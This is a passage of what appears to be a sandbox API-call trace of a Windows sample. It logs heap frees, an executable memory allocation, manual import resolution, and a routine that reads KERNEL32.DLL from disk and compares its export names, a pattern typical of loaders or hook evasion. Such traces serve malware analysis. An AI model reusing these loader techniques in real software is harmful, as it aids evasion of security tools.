(in: hHeap=0x570000, dwFlags=0x0, lpMem=0x34a9a20 | out: hHeap=0x570000) returned 1 [0193.790] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x34bcc30 | out: hHeap=0x570000) returned 1 [0193.790] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x34cfe40 | out: hHeap=0x570000) returned 1 [0193.790] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x34e3050 | out: hHeap=0x570000) returned 1 [0193.792] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x34f6260 | out: hHeap=0x570000) returned 1 [0193.794] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3509470 | out: hHeap=0x570000) returned 1 [0193.794] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x351c680 | out: hHeap=0x570000) returned 1 [0193.794] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x352f890 | out: hHeap=0x570000) returned 1 [0193.797] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3542aa0 | out: hHeap=0x570000) returned 1 [0193.797] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3555cb0 | out: hHeap=0x570000) returned 1 [0193.798] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3568ec0 | out: hHeap=0x570000) returned 1 [0193.798] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x357c0d0 | out: hHeap=0x570000) returned 1 [0193.799] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x358f2e0 | out: hHeap=0x570000) returned 1 [0193.799] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x35a24f0 | out: hHeap=0x570000) returned 1 [0193.799] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x35b5700 | out: hHeap=0x570000) returned 1 [0193.803] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x35c8910 | out: hHeap=0x570000) returned 1 [0193.805] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x35dbb20 | out: hHeap=0x570000) returned 1 [0193.805] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x35eed30 | out: hHeap=0x570000) returned 1 [0193.805] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3601f40 | out: hHeap=0x570000) returned 1 [0193.805] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3615150 | out: hHeap=0x570000) returned 1 [0193.809] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3628360 | out: hHeap=0x570000) returned 1 [0193.811] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x363b570 | out: hHeap=0x570000) returned 1 [0193.815] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x364e780 | out: hHeap=0x570000) returned 1 [0193.815] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3661990 | out: hHeap=0x570000) returned 1 [0193.815] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3674ba0 | out: hHeap=0x570000) returned 1 [0193.816] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3687db0 | out: hHeap=0x570000) returned 1 [0194.084] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x369afc0 | out: hHeap=0x570000) returned 1 [0194.084] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x36ae1d0 | out: hHeap=0x570000) returned 1 [0194.084] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x36c13e0 | out: hHeap=0x570000) returned 1 [0194.084] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x36d45f0 | out: hHeap=0x570000) returned 1 [0194.087] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x36e7800 | out: hHeap=0x570000) returned 1 [0194.088] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x36faa10 | out: hHeap=0x570000) returned 1 [0194.088] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x370dc20 | out: hHeap=0x570000) returned 1 [0194.088] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3720e30 | out: hHeap=0x570000) returned 1 [0194.091] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3734040 | out: hHeap=0x570000) returned 1 [0194.093] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3747250 | out: hHeap=0x570000) returned 1 [0194.096] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x375a460 | out: hHeap=0x570000) returned 1 [0194.096] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x376d670 | out: hHeap=0x570000) returned 1 [0194.097] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3780880 | out: hHeap=0x570000) returned 1 [0194.098] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3793a90 | out: hHeap=0x570000) returned 1 [0194.098] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x37a6ca0 | out: hHeap=0x570000) returned 1 [0194.098] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x37b9eb0 | out: hHeap=0x570000) returned 1 [0194.099] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x37cd0c0 | out: hHeap=0x570000) returned 1 [0194.100] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x37e02d0 | out: hHeap=0x570000) returned 1 [0194.101] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x37f34e0 | out: hHeap=0x570000) returned 1 [0194.102] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x38066f0 | out: hHeap=0x570000) returned 1 [0194.104] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3819900 | out: hHeap=0x570000) returned 1 [0194.104] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x382cb10 | out: hHeap=0x570000) returned 1 [0194.106] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x383fd20 | out: hHeap=0x570000) returned 1 [0194.108] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3852f30 | out: hHeap=0x570000) returned 1 [0194.111] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3866140 | out: hHeap=0x570000) returned 1 [0194.111] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3879350 | out: hHeap=0x570000) returned 1 [0194.111] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x388c560 | out: hHeap=0x570000) returned 1 [0194.111] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x389f770 | out: hHeap=0x570000) returned 1 [0194.112] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x38b2980 | out: hHeap=0x570000) returned 1 [0194.113] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x38c5b90 | out: hHeap=0x570000) returned 1 [0194.113] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x38d8da0 | out: hHeap=0x570000) returned 1 [0194.115] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x38ebfb0 | out: hHeap=0x570000) returned 1 [0194.116] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x38ff1c0 | out: hHeap=0x570000) returned 1 [0194.116] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39123d0 | out: hHeap=0x570000) returned 1 [0194.322] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39255e0 | out: hHeap=0x570000) returned 1 [0194.324] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39387f0 | out: hHeap=0x570000) returned 1 [0194.326] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x394ba00 | out: hHeap=0x570000) returned 1 [0194.329] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x395ec10 | out: hHeap=0x570000) returned 1 [0194.332] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3971e20 | out: hHeap=0x570000) returned 1 [0194.333] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3985030 | out: hHeap=0x570000) returned 1 [0194.333] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3998240 | out: hHeap=0x570000) returned 1 [0194.334] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39ab450 | out: hHeap=0x570000) returned 1 [0194.335] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39be660 | out: hHeap=0x570000) returned 1 [0194.337] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39d1870 | out: hHeap=0x570000) returned 1 [0194.338] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39e4a80 | out: hHeap=0x570000) returned 1 [0194.340] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39f7c90 | out: hHeap=0x570000) returned 1 [0194.341] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3a0aea0 | out: hHeap=0x570000) returned 1 [0194.344] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3a1e0b0 | out: hHeap=0x570000) returned 1 [0194.345] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3a312c0 | out: hHeap=0x570000) returned 1 [0194.347] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3a444d0 | out: hHeap=0x570000) returned 1 [0194.352] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3a576e0 | out: hHeap=0x570000) returned 1 [0194.357] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3a6a8f0 | out: hHeap=0x570000) returned 1 [0194.490] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3a7db00 | out: hHeap=0x570000) returned 1 [0194.491] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3a90d10 | out: hHeap=0x570000) returned 1 [0194.492] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3aa3f20 | out: hHeap=0x570000) returned 1 [0194.495] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3ab7130 | out: hHeap=0x570000) returned 1 [0194.497] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3aca340 | out: hHeap=0x570000) returned 1 [0194.499] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3add550 | out: hHeap=0x570000) returned 1 [0194.502] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3af0760 | out: hHeap=0x570000) returned 1 [0194.505] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x3b03970 | out: hHeap=0x570000) returned 1 [0194.509] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5ba690 | out: hHeap=0x570000) returned 1 [0194.509] VirtualAlloc (lpAddress=0x180000000, dwSize=0x19000, flAllocationType=0x3000, flProtect=0x40) returned 0x180000000 [0194.513] VirtualProtect (in: lpAddress=0x1800122e0, dwSize=0xc8, flNewProtect=0x4, lpflOldProtect=0x14f750 | out: lpflOldProtect=0x14f750*=0x40) returned 1 [0194.514] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x7ffc5ecd0000 [0194.515] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ExitProcess") returned 0x7ffc5ecf4d80 [0194.515] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0194.515] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0194.516] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcessHeap") returned 0x7ffc5eced4f0 [0194.516] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapAlloc") returned 0x7ffc5f8352d0 [0194.516] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapFree") returned 0x7ffc5eceb480 [0194.516] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="HeapReAlloc") returned 0x7ffc5f8339f0 [0194.516] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatA") returned 0x7ffc5ecf6bb0 [0194.516] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcatW") returned 0x7ffc5ecfa250 [0194.516] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcmpA") returned 0x7ffc5ecf3690 [0194.517] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyA") returned 0x7ffc5ecf45d0 [0194.517] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpyW") returned 0x7ffc5ecf6d30 [0194.517] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrcpynW") returned 0x7ffc5ecf91a0 [0194.517] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenA") returned 0x7ffc5ecf0c60 [0194.517] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="lstrlenW") returned 0x7ffc5eced6d0 [0194.517] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x7ffc5e960000 [0194.517] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfA") returned 0x7ffc5e984d50 [0194.518] GetProcAddress (hModule=0x7ffc5e960000, lpProcName="wsprintfW") returned 0x7ffc5e9881e0 [0194.518] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x7ffc5e7b0000 [0194.518] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnA") returned 0x7ffc5e7c5b00 [0194.518] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrCSpnW") returned 0x7ffc5e7bd780 [0194.518] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrDupA") returned 0x7ffc5e7c5c30 [0194.519] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnA") returned 0x7ffc5e7c5ca0 [0194.519] GetProcAddress (hModule=0x7ffc5e7b0000, lpProcName="StrSpnW") returned 0x7ffc5e7c5cb0 [0194.519] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x59db40 | out: hHeap=0x570000) returned 1 [0194.519] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x5bd940 | out: hHeap=0x570000) returned 1 [0194.765] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x580270 | out: hHeap=0x570000) returned 1 [0194.767] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0194.768] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0194.768] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0194.768] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0194.768] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0194.768] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0194.770] GetProcessHeap () returned 0x570000 [0194.770] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x68) returned 0x578d40 [0194.771] GetProcessHeap () returned 0x570000 [0194.771] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x10) returned 0x5890e0 [0194.771] GetProcessHeap () returned 0x570000 [0194.771] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x48) returned 0x580b30 [0194.772] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0194.772] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0194.772] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0194.772] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0194.772] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0194.772] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0194.772] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0194.772] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0194.772] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0194.772] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0194.773] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0194.773] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0194.782] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0194.782] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0194.782] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0194.783] GetProcessHeap () returned 0x570000 [0194.783] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xac430) returned 0x59c5f0 [0194.785] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0194.785] ReadFile (in: hFile=0x134, lpBuffer=0x59c5f0, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x59c5f0*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0194.971] CloseHandle (hObject=0x134) returned 1 [0194.972] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0194.979] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0194.979] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0194.979] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0194.979] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0194.979] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0194.979] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0194.979] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0194.979] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0194.979] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0194.979] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0194.979] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0194.979] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0194.979] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0194.979] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0194.979] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0194.979] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0194.979] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0194.980] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0194.980] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0194.980] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0194.980] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0194.980] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0194.980] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0194.980] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0194.980] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0194.980] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0194.980] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0194.980] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0194.980] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0194.980] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0194.980] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0194.980] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0194.980] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0194.980] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0194.980] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0194.980] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0194.980] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0194.980] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0194.980] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0194.980] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0194.981] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0194.981] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0194.981] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0194.981] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0194.981] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0194.981] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0194.981] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0194.981] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0194.981] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0194.981] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0194.981] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0194.981] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0194.981] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0194.981] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0194.981] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0194.981] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0194.981] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0194.981] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0194.981] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0194.981] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0194.981] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0194.982] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0194.982] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0194.982] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0194.982] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0194.982] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0194.982] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0194.982] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0194.982] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0194.982] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0194.982] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0194.982] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0194.982] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0194.982] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0194.982] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0194.982] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0194.982] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0194.982] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0194.982] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0194.982] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0194.982] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0194.982] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0194.982] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0194.982] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0194.982] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0194.982] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0194.983] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0194.983] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0194.983] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0194.983] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0194.983] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0194.983] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0194.983] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0194.983] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0194.983] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0194.983] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0194.983] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0194.983] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0194.983] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0194.983] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0194.983] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0194.983] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0194.983] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0194.983] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0194.983] lstrcmpA (lpString1="AddResourceAttributeAce", 